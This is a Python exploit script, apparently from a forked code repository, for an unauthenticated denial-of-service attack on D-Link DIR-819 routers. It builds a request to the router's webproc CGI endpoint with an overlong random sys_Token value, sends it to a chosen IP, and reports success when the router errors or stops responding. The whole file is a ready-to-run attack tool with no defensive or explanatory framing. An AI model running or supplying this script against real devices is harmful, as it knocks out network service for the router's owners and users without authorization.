forked from dlink-dir_819/dlink-dir-819-dos
91 lines
2.7 KiB
Python
Executable File
91 lines
2.7 KiB
Python
Executable File
#!/usr/bin/env python3
|
|
import sys
|
|
import string
|
|
import urllib3
|
|
import requests
|
|
import argparse
|
|
import random
|
|
import socket
|
|
from rich import print
|
|
|
|
|
|
# Disable SSL Warnings
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
|
|
|
|
# Globals
|
|
TIMEOUT = 30
|
|
#BUFFER_LEN = 19
|
|
BUFFER_LEN = 32
|
|
|
|
# Class to exploit
|
|
class Exploit:
|
|
def __init__(self, ip, is_ssl):
|
|
"""Initialize the constructor"""
|
|
|
|
self.ip = ip
|
|
self.is_ssl = is_ssl
|
|
|
|
_payload = f"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}"
|
|
|
|
if self.is_ssl:
|
|
self.payload = f"https://{_payload}"
|
|
else:
|
|
self.payload = f"http://{_payload}"
|
|
|
|
|
|
def show(self):
|
|
"""Show the parameters"""
|
|
|
|
print(f"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]")
|
|
print(f"[bold][[cyan]i[/cyan]] Using SSL: [green]{self.is_ssl}[/green][/bold]")
|
|
print(f"[bold][[cyan]i[/cyan]] Request Timeout: [green]{TIMEOUT}s[/green][/bold]")
|
|
print(f"[bold][[cyan]i[/cyan]] Buffer Length: [green]{BUFFER_LEN}[/green][/bold]")
|
|
print(f"[bold][[cyan]i[/cyan]] Payload: [green]{self.payload}[/green][/bold]")
|
|
|
|
|
|
def run(self):
|
|
"""Run the exploit"""
|
|
print(f"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]")
|
|
self.show()
|
|
|
|
try:
|
|
r = requests.get(self.payload, verify=False, timeout=TIMEOUT)
|
|
if "Internal Error" in r.text:
|
|
print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
|
|
print(f"[bold][[green]+[/green]] Router services must be down![/bold]")
|
|
else:
|
|
print(f"[bold][[red]![/red]] Exploit Failed :([/bold]")
|
|
|
|
except requests.exceptions.Timeout:
|
|
print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
|
|
|
|
except Exception as e:
|
|
print(f"Error occured as: {e}")
|
|
|
|
|
|
def main():
|
|
"""Main function to run"""
|
|
|
|
parser = argparse.ArgumentParser(
|
|
description="DLink DIR-819 Unauthenticated DoS")
|
|
parser.add_argument('-i', '--ip', required=True, help="IP of the router")
|
|
parser.add_argument('-s', '--ssl', required=False, action="store_true")
|
|
|
|
opts = parser.parse_args()
|
|
|
|
try:
|
|
ip = socket.gethostbyname(opts.ip)
|
|
except socket.error:
|
|
print("[bold red][!] Invalid IP address[/bold red]", file=sys.stderr)
|
|
return
|
|
|
|
is_ssl = opts.ssl
|
|
|
|
exploit = Exploit(ip, is_ssl)
|
|
exploit.run()
|
|
|
|
|
|
if __name__ == '__main__':
|
|
main()
|